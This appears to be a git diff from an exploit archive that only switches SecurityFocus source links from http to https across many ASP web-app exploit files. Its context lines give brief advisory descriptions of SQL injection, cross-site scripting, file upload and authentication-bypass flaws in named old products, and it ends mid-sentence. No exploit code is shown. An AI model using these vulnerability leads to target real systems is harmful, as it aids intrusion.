@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4192/info +source: https://www.securityfocus.com/bid/4192/info Snitz Forums 2000 is ASP-based web forum software. It runs on Microsoft Windows operating systems. diff --git a/exploits/asp/webapps/21400.txt b/exploits/asp/webapps/21400.txt index 01a7ee331..7273e90a5 100644 --- a/exploits/asp/webapps/21400.txt +++ b/exploits/asp/webapps/21400.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4558/info +source: https://www.securityfocus.com/bid/4558/info Snitz Forums 2000 is ASP-based web forum software. It runs on Microsoft Windows operating systems. Snitz is back-ended by a database and supports Microsoft Access 97/2000, SQL Server 6.5/7.0/2000 and MySQL. diff --git a/exploits/asp/webapps/21434.txt b/exploits/asp/webapps/21434.txt index 8c0b70afb..d69b44053 100644 --- a/exploits/asp/webapps/21434.txt +++ b/exploits/asp/webapps/21434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4661/info +source: https://www.securityfocus.com/bid/4661/info Spooky Login is a commerical web access control and account management software package. It is distributed and maintained by Outfront, and is designed for Microsoft IIS Webservers. diff --git a/exploits/asp/webapps/21455.txt b/exploits/asp/webapps/21455.txt index b873062e0..92cfab903 100644 --- a/exploits/asp/webapps/21455.txt +++ b/exploits/asp/webapps/21455.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4759/info +source: https://www.securityfocus.com/bid/4759/info Hosting Controller is an application which consolidates all hosting tasks into one interface. Hosting Controller runs on Microsoft Windows operating systems. diff --git a/exploits/asp/webapps/21457.txt b/exploits/asp/webapps/21457.txt index 3537eead2..84c6d669d 100644 --- a/exploits/asp/webapps/21457.txt +++ b/exploits/asp/webapps/21457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4761/info +source: https://www.securityfocus.com/bid/4761/info Hosting Controller is an application which consolidates all hosting tasks into one interface. Hosting Controller runs on Microsoft Windows operating systems. diff --git a/exploits/asp/webapps/21464.txt b/exploits/asp/webapps/21464.txt index a80f68be9..ccc651cc4 100644 --- a/exploits/asp/webapps/21464.txt +++ b/exploits/asp/webapps/21464.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4778/info +source: https://www.securityfocus.com/bid/4778/info Hosting Controller is an application which consolidates all hosting tasks into one interface. Hosting Controller runs on Microsoft Windows operating systems. diff --git a/exploits/asp/webapps/21702.txt b/exploits/asp/webapps/21702.txt index 22fe75c2c..35a44e3a7 100644 --- a/exploits/asp/webapps/21702.txt +++ b/exploits/asp/webapps/21702.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5438/info +source: https://www.securityfocus.com/bid/5438/info Midicart ASP is a commercially available e-commerce solution distributed by Coxco Support. It is available for the Microsoft Windows operating system. diff --git a/exploits/asp/webapps/21766.txt b/exploits/asp/webapps/21766.txt index a1c0dbc57..c2bf28ff9 100644 --- a/exploits/asp/webapps/21766.txt +++ b/exploits/asp/webapps/21766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5600/info +source: https://www.securityfocus.com/bid/5600/info FactoSystem Weblog is a freely available, open source software package for weblogging and managing content. It is available for Microsoft Windows operating systems. diff --git a/exploits/asp/webapps/21914.txt b/exploits/asp/webapps/21914.txt index d9c9909ab..477d0598b 100644 --- a/exploits/asp/webapps/21914.txt +++ b/exploits/asp/webapps/21914.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5915/info +source: https://www.securityfocus.com/bid/5915/info SSGbook includes codes for allowing users to specify HTML formatting and layout inside of guestbook entries. For example, a user can include an image by including it inside of [image] or [img] tags. However, arbitrary HTML and script code are not sufficiently sanitized within these tags. diff --git a/exploits/asp/webapps/21920.txt b/exploits/asp/webapps/21920.txt index b316a5397..265bf8c4f 100644 --- a/exploits/asp/webapps/21920.txt +++ b/exploits/asp/webapps/21920.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5922/info +source: https://www.securityfocus.com/bid/5922/info Microsoft Content Management Server 2001 is reported to be prone to cross-site scripting attacks. diff --git a/exploits/asp/webapps/21924.txt b/exploits/asp/webapps/21924.txt index 1e3a7408d..3251913f7 100644 --- a/exploits/asp/webapps/21924.txt +++ b/exploits/asp/webapps/21924.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5928/info +source: https://www.securityfocus.com/bid/5928/info SurfControl SuperScout Email Filter comes with a web-based interface to provide remote access to administrative facilities. diff --git a/exploits/asp/webapps/21925.txt b/exploits/asp/webapps/21925.txt index 0b8c08c4f..8cd086e61 100644 --- a/exploits/asp/webapps/21925.txt +++ b/exploits/asp/webapps/21925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5929/info +source: https://www.securityfocus.com/bid/5929/info SurfControl SuperScout Email Filter comes with a web-based interface to provide remote access to administrative facilities. diff --git a/exploits/asp/webapps/22357.txt b/exploits/asp/webapps/22357.txt index 6513c2b16..2211a27c2 100644 --- a/exploits/asp/webapps/22357.txt +++ b/exploits/asp/webapps/22357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7108/info +source: https://www.securityfocus.com/bid/7108/info A cross-site scripting vulnerability has been discovered in ClearTrust. Specifically, the login page for the management application is not properly sanitized of some user-supplied values. diff --git a/exploits/asp/webapps/22436.txt b/exploits/asp/webapps/22436.txt index 0fb594045..bb68d8af1 100644 --- a/exploits/asp/webapps/22436.txt +++ b/exploits/asp/webapps/22436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7211/info +source: https://www.securityfocus.com/bid/7211/info It has been reported that MyGuestBK does not sufficiently filter user-supplied URI parameters on the MyGuestBK Information Server 'Add Entry' page. diff --git a/exploits/asp/webapps/22437.txt b/exploits/asp/webapps/22437.txt index 897838439..bd2a90324 100644 --- a/exploits/asp/webapps/22437.txt +++ b/exploits/asp/webapps/22437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7213/info +source: https://www.securityfocus.com/bid/7213/info MyGuestBk has been reported vulnerable to unauthorized Admin Panel Access. diff --git a/exploits/asp/webapps/22484.txt b/exploits/asp/webapps/22484.txt index 43178fccf..e631ac18f 100644 --- a/exploits/asp/webapps/22484.txt +++ b/exploits/asp/webapps/22484.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7328/info +source: https://www.securityfocus.com/bid/7328/info Ocean12 Guestbook Manager has been reported prone to sensitive information disclosure vulnerability. diff --git a/exploits/asp/webapps/22487.txt b/exploits/asp/webapps/22487.txt index f0b6e877b..ccec4e369 100644 --- a/exploits/asp/webapps/22487.txt +++ b/exploits/asp/webapps/22487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7341/info +source: https://www.securityfocus.com/bid/7341/info Web Wiz Site News has been reported prone to sensitive information disclosure vulnerability. diff --git a/exploits/asp/webapps/22507.txt b/exploits/asp/webapps/22507.txt index 805b2d57b..70bb83a27 100644 --- a/exploits/asp/webapps/22507.txt +++ b/exploits/asp/webapps/22507.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7380/info +source: https://www.securityfocus.com/bid/7380/info Web Wiz Forum has been reported prone to sensitive information disclosure vulnerability. diff --git a/exploits/asp/webapps/22513.txt b/exploits/asp/webapps/22513.txt index a75bfc91c..c188a2f3c 100644 --- a/exploits/asp/webapps/22513.txt +++ b/exploits/asp/webapps/22513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7390/info +source: https://www.securityfocus.com/bid/7390/info MPCSoftWeb does not sufficiently secure the database file. It is possible for remote attackers to request the database file and gain access to sensitive information such as administrative credentials for the guestbook. diff --git a/exploits/asp/webapps/22529.txt b/exploits/asp/webapps/22529.txt index 02907c977..2bf47a4e1 100644 --- a/exploits/asp/webapps/22529.txt +++ b/exploits/asp/webapps/22529.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7416/info +source: https://www.securityfocus.com/bid/7416/info bttlxe Forum is a web-based discussion forum implemented in ASP. diff --git a/exploits/asp/webapps/22554.txt b/exploits/asp/webapps/22554.txt index 337789831..51dadd50d 100644 --- a/exploits/asp/webapps/22554.txt +++ b/exploits/asp/webapps/22554.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7470/info +source: https://www.securityfocus.com/bid/7470/info A vulnerability has been reported for BizTalk Server which may make it possible for remote users to modify database query logic. The vulnerability exists in some of the pages used by the DTA interface. diff --git a/exploits/asp/webapps/22555.txt b/exploits/asp/webapps/22555.txt index 39dd5ea01..b209a19dd 100644 --- a/exploits/asp/webapps/22555.txt +++ b/exploits/asp/webapps/22555.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7470/info +source: https://www.securityfocus.com/bid/7470/info A vulnerability has been reported for BizTalk Server which may make it possible for remote users to modify database query logic. The vulnerability exists in some of the pages used by the DTA interface. diff --git a/exploits/asp/webapps/22583.pl b/exploits/asp/webapps/22583.pl index 5eff162f1..49992132e 100755 --- a/exploits/asp/webapps/22583.pl +++ b/exploits/asp/webapps/22583.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7549/info +source: https://www.securityfocus.com/bid/7549/info Snitz Forums 2000 is ASP-based web forum software. It runs on Microsoft Windows operating systems. Snitz is back-ended by a database and supports Microsoft Access 97/2000, SQL Server 6.5/7.0/2000 and MySQL. diff --git a/exploits/asp/webapps/22639.txt b/exploits/asp/webapps/22639.txt index 5a3630c52..3599c8e7c 100644 --- a/exploits/asp/webapps/22639.txt +++ b/exploits/asp/webapps/22639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7675/info +source: https://www.securityfocus.com/bid/7675/info The IISProtect web administration interface does not properly sanitize user input. This could allow for SQL injection attacks on a Microsoft IIS server running IISProtect. diff --git a/exploits/asp/webapps/22673.txt b/exploits/asp/webapps/22673.txt index 01916dce4..934804da4 100644 --- a/exploits/asp/webapps/22673.txt +++ b/exploits/asp/webapps/22673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7739/info +source: https://www.securityfocus.com/bid/7739/info A vulnerability has been discovered in the 'philboard_admin.asp' script used by Philboard. The problem occurs during authentication and may allow an attacker to gain unauthorized administrative access. diff --git a/exploits/asp/webapps/22697.asp b/exploits/asp/webapps/22697.asp index 2e0af8cc9..adf473511 100644 --- a/exploits/asp/webapps/22697.asp +++ b/exploits/asp/webapps/22697.asp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7765/info +source: https://www.securityfocus.com/bid/7765/info A vulnerability has been reported for iisCart2000 that may result in an attacker uploading arbitrary files to a vulnerable server. The vulnerability exists in the upload.asp script. This will allow an attacker to upload arbitrary files to the vulnerable server. Successful exploitation may result in the execution of attacker-supplied code. diff --git a/exploits/asp/webapps/22698.pl b/exploits/asp/webapps/22698.pl index b4c9d0c42..a193dc3bb 100755 --- a/exploits/asp/webapps/22698.pl +++ b/exploits/asp/webapps/22698.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7766/info +source: https://www.securityfocus.com/bid/7766/info This vulnerability is reportedly caused by a lack of sufficient sanitization of user-supplied data contained in URI parameters supplied to WebStores2000. diff --git a/exploits/asp/webapps/22724.txt b/exploits/asp/webapps/22724.txt index 956a0b56f..450125062 100644 --- a/exploits/asp/webapps/22724.txt +++ b/exploits/asp/webapps/22724.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7804/info +source: https://www.securityfocus.com/bid/7804/info Several software products maintained by Xpressions Interactive are prone to SQL injection attacks. diff --git a/exploits/asp/webapps/22730.txt b/exploits/asp/webapps/22730.txt index a5d7b60be..cb3b328c5 100644 --- a/exploits/asp/webapps/22730.txt +++ b/exploits/asp/webapps/22730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7813/info +source: https://www.securityfocus.com/bid/7813/info Mailtraq is vulnerable to cross-site scripting attacks. The vulnerability exists due to insufficient sanitization of HTTP requests to the vulnerable Mailtraq server. diff --git a/exploits/asp/webapps/22731.txt b/exploits/asp/webapps/22731.txt index f0d32bfee..06074e0e9 100644 --- a/exploits/asp/webapps/22731.txt +++ b/exploits/asp/webapps/22731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7815/info +source: https://www.securityfocus.com/bid/7815/info A vulnerability has been reported for Mailtraq that may result in the disclosure of path information. diff --git a/exploits/asp/webapps/22744.txt b/exploits/asp/webapps/22744.txt index b39733b28..1c0624a9e 100644 --- a/exploits/asp/webapps/22744.txt +++ b/exploits/asp/webapps/22744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7833/info +source: https://www.securityfocus.com/bid/7833/info Synkron.web is prone to HTML injection attacks. The vulnerability exists in the search script and is a result of insufficient sanitization of malicious HTML code from user-supplied input. HTML and script code may be echoed back when an existing user is views a cached search page. diff --git a/exploits/asp/webapps/22746.txt b/exploits/asp/webapps/22746.txt index 52e0a3643..5797c1875 100644 --- a/exploits/asp/webapps/22746.txt +++ b/exploits/asp/webapps/22746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7837/info +source: https://www.securityfocus.com/bid/7837/info A number of vulnerabilities have been discovered in the MaxWebPortal. diff --git a/exploits/asp/webapps/22747.txt b/exploits/asp/webapps/22747.txt index 7dfa58150..09e6df076 100644 --- a/exploits/asp/webapps/22747.txt +++ b/exploits/asp/webapps/22747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7837/info +source: https://www.securityfocus.com/bid/7837/info A number of vulnerabilities have been discovered in the MaxWebPortal. diff --git a/exploits/asp/webapps/22778.txt b/exploits/asp/webapps/22778.txt index a5caa43dc..9fa1c22e7 100644 --- a/exploits/asp/webapps/22778.txt +++ b/exploits/asp/webapps/22778.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7922/info +source: https://www.securityfocus.com/bid/7922/info Snitz Forums is prone to cross-site scripting attacks. This is due to insufficient sanitization of data passed to the search facility via URI parameters. diff --git a/exploits/asp/webapps/22864.txt b/exploits/asp/webapps/22864.txt index 98f180fab..8353f37c2 100644 --- a/exploits/asp/webapps/22864.txt +++ b/exploits/asp/webapps/22864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8103/info +source: https://www.securityfocus.com/bid/8103/info ProductCart has been reported prone to an SQL injection vulnerability that may be exploited to reveal information relating to the underlying database; other attacks may also be possible. diff --git a/exploits/asp/webapps/22865.txt b/exploits/asp/webapps/22865.txt index b8caef056..0833079c9 100644 --- a/exploits/asp/webapps/22865.txt +++ b/exploits/asp/webapps/22865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8105/info +source: https://www.securityfocus.com/bid/8105/info ProductCart has been reported prone to an SQL injection vulnerability that may be exploited to bypass the ProductCart authentication system and access the ProductCart administration panel; other attacks may also be possible. diff --git a/exploits/asp/webapps/22866.txt b/exploits/asp/webapps/22866.txt index 857712b48..96dbe2055 100644 --- a/exploits/asp/webapps/22866.txt +++ b/exploits/asp/webapps/22866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8108/info +source: https://www.securityfocus.com/bid/8108/info A cross-site scripting vulnerability has been reported for ProductCart. The vulnerability exists due to insufficient sanitization of some user-supplied values. diff --git a/exploits/asp/webapps/22868.txt b/exploits/asp/webapps/22868.txt index f5a9da665..c405403fa 100644 --- a/exploits/asp/webapps/22868.txt +++ b/exploits/asp/webapps/22868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8112/info +source: https://www.securityfocus.com/bid/8112/info A vulnerability has been reported for ProductCart that may result in an attacker obtaining the contents of the database file. diff --git a/exploits/asp/webapps/22885.asp b/exploits/asp/webapps/22885.asp index 1bf407bd1..34eebb103 100644 --- a/exploits/asp/webapps/22885.asp +++ b/exploits/asp/webapps/22885.asp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8153/info +source: https://www.securityfocus.com/bid/8153/info Zone-H has reported that the Q-Shop ASP shopping cart software contains a vulnerability that may allow remote attackers to upload arbitrary files. Once uploaded, the attacker may be able to have the script executed in the security context of the Web server. It is reported that Q-Shop provides an interface intended for administrators to upload files, however when this file is requested directly, no authentication is required. diff --git a/exploits/asp/webapps/22888.pl b/exploits/asp/webapps/22888.pl index 71fc45b59..c99cbf857 100755 --- a/exploits/asp/webapps/22888.pl +++ b/exploits/asp/webapps/22888.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8159/info +source: https://www.securityfocus.com/bid/8159/info It has been reported that VP-ASP does not sufficiently sanitize user input passed to the shopexd.asp script contained in the software. As a result, it may be possible for remote attackers to embed SQL commands which are to be passed to the underlying database engine. diff --git a/exploits/asp/webapps/22889.pl b/exploits/asp/webapps/22889.pl index 7bae844b9..c9951ea7f 100755 --- a/exploits/asp/webapps/22889.pl +++ b/exploits/asp/webapps/22889.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8159/info +source: https://www.securityfocus.com/bid/8159/info It has been reported that VP-ASP does not sufficiently sanitize user input passed to the shopexd.asp script contained in the software. As a result, it may be possible for remote attackers to embed SQL commands which are to be passed to the underlying database engine. diff --git a/exploits/asp/webapps/22895.txt b/exploits/asp/webapps/22895.txt index 8aaf892de..630180751 100644 --- a/exploits/asp/webapps/22895.txt +++ b/exploits/asp/webapps/22895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8172/info +source: https://www.securityfocus.com/bid/8172/info It has been reported that a vulnerability exists in ASP-DEV Discussion Forum that exposes potentially sensitive information. Because of this, an attacker may be able to gain access to user credentials. diff --git a/exploits/asp/webapps/22921.txt b/exploits/asp/webapps/22921.txt index 7f02a0f46..07a0f53cc 100644 --- a/exploits/asp/webapps/22921.txt +++ b/exploits/asp/webapps/22921.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8210/info +source: https://www.securityfocus.com/bid/8210/info .netCART is a web based e-commerce and shopping cart site designed for ASP.NET. diff --git a/exploits/asp/webapps/22992.txt b/exploits/asp/webapps/22992.txt index 06941febe..c87000a76 100644 --- a/exploits/asp/webapps/22992.txt +++ b/exploits/asp/webapps/22992.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8360/info +source: https://www.securityfocus.com/bid/8360/info IdealBB error.asp page has been reported prone to a cross-site scripting vulnerability. diff --git a/exploits/asp/webapps/23032.txt b/exploits/asp/webapps/23032.txt index e3f7debd9..a9f81b121 100644 --- a/exploits/asp/webapps/23032.txt +++ b/exploits/asp/webapps/23032.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8417/info +source: https://www.securityfocus.com/bid/8417/info It has been reported that a html injection issue exists in the Clickcess ChitChat.NET discussion forum software. The vulnerability is reported to be present in the Name and Topic Title text boxes. The problem may allow a remote attacker to inject malicious HTML and script code into the website. diff --git a/exploits/asp/webapps/23033.txt b/exploits/asp/webapps/23033.txt index 9b5f9d4da..c1e3bc770 100644 --- a/exploits/asp/webapps/23033.txt +++ b/exploits/asp/webapps/23033.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8417/info +source: https://www.securityfocus.com/bid/8417/info It has been reported that a html injection issue exists in the Clickcess ChitChat.NET discussion forum software. The vulnerability is reported to be present in the Name and Topic Title text boxes. The problem may allow a remote attacker to inject malicious HTML and script code into the website. diff --git a/exploits/asp/webapps/23035.txt b/exploits/asp/webapps/23035.txt index e19fcafc3..d407dd8a5 100644 --- a/exploits/asp/webapps/23035.txt +++ b/exploits/asp/webapps/23035.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8426/info +source: https://www.securityfocus.com/bid/8426/info A vulnerability has been reported for Poster.version:two. The problem occurs due to the application failing to lock the 'setup' variable after initialization. As a result, an attacker may access this variable to add additional adminstrator users to the forum. This may effectively allow for the theft or modification of sensitive information. diff --git a/exploits/asp/webapps/23055.txt b/exploits/asp/webapps/23055.txt index 5f539ab5d..81db9a821 100644 --- a/exploits/asp/webapps/23055.txt +++ b/exploits/asp/webapps/23055.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8480/info +source: https://www.securityfocus.com/bid/8480/info IdealBB is prone to an HTML injection vulnerability. This could permit remote attackers to inject malicious HTML and script code into board messages. The attacker's code may be rendered in the web browser of the user viewing the malicious message. diff --git a/exploits/asp/webapps/23120.txt b/exploits/asp/webapps/23120.txt index 1c04ba981..955beaf50 100644 --- a/exploits/asp/webapps/23120.txt +++ b/exploits/asp/webapps/23120.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8563/info +source: https://www.securityfocus.com/bid/8563/info It has been reported that ICQ Webfront is prone to a cross-site scripting vulnerability in the message field of the guestbook module. This issue is caused by improper sanitization of user-supplied data. diff --git a/exploits/asp/webapps/23195.txt b/exploits/asp/webapps/23195.txt index b162c0828..db6edd106 100644 --- a/exploits/asp/webapps/23195.txt +++ b/exploits/asp/webapps/23195.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8722/info +source: https://www.securityfocus.com/bid/8722/info A-Cart has been reported prone to a cross-site scripting vulnerability. The issue presents itself likely due to a lack of sufficient sanitization performed on data contained in the 'msg' URI parameter that is passed to signin.asp. diff --git a/exploits/asp/webapps/23326.txt b/exploits/asp/webapps/23326.txt index 2de61c4d6..ebe1f7f66 100644 --- a/exploits/asp/webapps/23326.txt +++ b/exploits/asp/webapps/23326.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8948/info +source: https://www.securityfocus.com/bid/8948/info It has been reported that HTTP Commander is prone a directory traversal issue allowing a remote attacker to traverse outside the server root directory by using '../' character sequences. diff --git a/exploits/asp/webapps/23331.txt b/exploits/asp/webapps/23331.txt index 4d3ad5f5f..7731d5d0a 100644 --- a/exploits/asp/webapps/23331.txt +++ b/exploits/asp/webapps/23331.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8957/info +source: https://www.securityfocus.com/bid/8957/info A vulnerability has been reported in Web Wiz Forum that could allow unauthorized access to private forums. The problem occurs when handling malformed requests that make use of 'quote' mode. When this mode is used, Web Wiz Forum will allegedly fail to carry out sufficient checks between the requested forum and message. As a result, an attacker could potentially read or write to a private forum. diff --git a/exploits/asp/webapps/23335.txt b/exploits/asp/webapps/23335.txt index 0822d33e9..7b8570598 100644 --- a/exploits/asp/webapps/23335.txt +++ b/exploits/asp/webapps/23335.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8967/info +source: https://www.securityfocus.com/bid/8967/info It has been reported that VieNuke VieBoard may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database. diff --git a/exploits/asp/webapps/23407.txt b/exploits/asp/webapps/23407.txt index 06192432e..779a402fc 100644 --- a/exploits/asp/webapps/23407.txt +++ b/exploits/asp/webapps/23407.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9133/info +source: https://www.securityfocus.com/bid/9133/info It has been reported that VP-ASP may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database. The problem exists in the 'shopsearch.asp' script of the software. diff --git a/exploits/asp/webapps/23408.txt b/exploits/asp/webapps/23408.txt index 42a31d03e..24ae660cf 100644 --- a/exploits/asp/webapps/23408.txt +++ b/exploits/asp/webapps/23408.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9134/info +source: https://www.securityfocus.com/bid/9134/info It has been reported that VP-ASP may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database. The problem exists in the 'shopdisplayproducts.asp' script of the software. diff --git a/exploits/asp/webapps/23415.txt b/exploits/asp/webapps/23415.txt index b1e86fc6a..7dc740e18 100644 --- a/exploits/asp/webapps/23415.txt +++ b/exploits/asp/webapps/23415.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9164/info +source: https://www.securityfocus.com/bid/9164/info A vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this issue to potentially execute HTML or script code in the security context of the vulnerable site. diff --git a/exploits/asp/webapps/23440.txt b/exploits/asp/webapps/23440.txt index f3e62b017..809d7ed17 100644 --- a/exploits/asp/webapps/23440.txt +++ b/exploits/asp/webapps/23440.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9223/info +source: https://www.securityfocus.com/bid/9223/info Multiple vulnerabilities were reported in EPIServer that include directory traversal, information disclosure, and denial of service. These issue result from insufficient sanitization of user-supplied input. diff --git a/exploits/asp/webapps/23515.txt b/exploits/asp/webapps/23515.txt index d3bab76ec..1e4511eb1 100644 --- a/exploits/asp/webapps/23515.txt +++ b/exploits/asp/webapps/23515.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9354/info +source: https://www.securityfocus.com/bid/9354/info A problem has been identified in ASPapp PortalApp when user credentials are stored on a system. Because of this, an attacker may be able to gain unauthorized access to sensitive information. diff --git a/exploits/asp/webapps/23516.txt b/exploits/asp/webapps/23516.txt index 38ee15127..f12a3f536 100644 --- a/exploits/asp/webapps/23516.txt +++ b/exploits/asp/webapps/23516.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9355/info +source: https://www.securityfocus.com/bid/9355/info A problem has been identified in ASP-Nuke when user credentials are stored on a system. Because of this, an attacker may be able to gain unauthorized access to sensitive information. diff --git a/exploits/asp/webapps/23547.txt b/exploits/asp/webapps/23547.txt index 4a4613896..bc77944c0 100644 --- a/exploits/asp/webapps/23547.txt +++ b/exploits/asp/webapps/23547.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9438/info +source: https://www.securityfocus.com/bid/9438/info XtremeASP PhotoGallery is prone to an SQL injection vulnerability. The issue is reported to exist in the administration login interface, which does not sufficiently sanitize user-supplied input for username and password values before including it in SQL queries. This could permit remote attackers to pass malicious input to database queries. diff --git a/exploits/asp/webapps/23561.txt b/exploits/asp/webapps/23561.txt index 107c71e5d..4e1f62357 100644 --- a/exploits/asp/webapps/23561.txt +++ b/exploits/asp/webapps/23561.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9462/info +source: https://www.securityfocus.com/bid/9462/info It has been reported that various DUware products may be prone to an access validation issue allowing a remote attacker to gain access to sensitive resources by bypassing authentication. An arbitrary file upload vulnerability has been specified in DUpics that may allow a remote attacker to upload files to a vulnerable system. diff --git a/exploits/asp/webapps/23635.txt b/exploits/asp/webapps/23635.txt index 3603ed0c7..37aed9da3 100644 --- a/exploits/asp/webapps/23635.txt +++ b/exploits/asp/webapps/23635.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9555/info +source: https://www.securityfocus.com/bid/9555/info The showcode.asp script activated in Sample_showcode.html may be vulnerable to a directory traversal issue. A remote attacker may view any files readable by the web server using '../' escape sequences in URI requests. diff --git a/exploits/asp/webapps/23676.txt b/exploits/asp/webapps/23676.txt index 8e9ae5f2a..c5b6fab76 100644 --- a/exploits/asp/webapps/23676.txt +++ b/exploits/asp/webapps/23676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9625/info +source: https://www.securityfocus.com/bid/9625/info It has been reported that MaxWebPortal may be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied input. The specific issues include cross-site scripting, HTML injection and SQL injection. diff --git a/exploits/asp/webapps/23677.txt b/exploits/asp/webapps/23677.txt index 57d8c04ac..c544e4d20 100644 --- a/exploits/asp/webapps/23677.txt +++ b/exploits/asp/webapps/23677.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9625/info +source: https://www.securityfocus.com/bid/9625/info It has been reported that MaxWebPortal may be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied input. The specific issues include cross-site scripting, HTML injection and SQL injection. diff --git a/exploits/asp/webapps/23696.pl b/exploits/asp/webapps/23696.pl index a096b87e9..ab8b3f340 100755 --- a/exploits/asp/webapps/23696.pl +++ b/exploits/asp/webapps/23696.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9659/info +source: https://www.securityfocus.com/bid/9659/info ASP Portal has been reported to be prone to multiple vulnerabilities. diff --git a/exploits/asp/webapps/23702.txt b/exploits/asp/webapps/23702.txt index 28422d3cf..ac9d05881 100644 --- a/exploits/asp/webapps/23702.txt +++ b/exploits/asp/webapps/23702.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9669/info +source: https://www.securityfocus.com/bid/9669/info EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could expose sensitive data such as user credentials and allow for execution of hostile script code and HTML. These issues could allow for full compromise of the software. diff --git a/exploits/asp/webapps/23703.txt b/exploits/asp/webapps/23703.txt index 63fb67e55..cb74dafcf 100644 --- a/exploits/asp/webapps/23703.txt +++ b/exploits/asp/webapps/23703.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9669/info +source: https://www.securityfocus.com/bid/9669/info EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could expose sensitive data such as user credentials and allow for execution of hostile script code and HTML. These issues could allow for full compromise of the software. diff --git a/exploits/asp/webapps/23704.txt b/exploits/asp/webapps/23704.txt index 6f9e8b367..709129c72 100644 --- a/exploits/asp/webapps/23704.txt +++ b/exploits/asp/webapps/23704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9669/info +source: https://www.securityfocus.com/bid/9669/info EarlyImpact ProductCart is reportedly prone to multiple 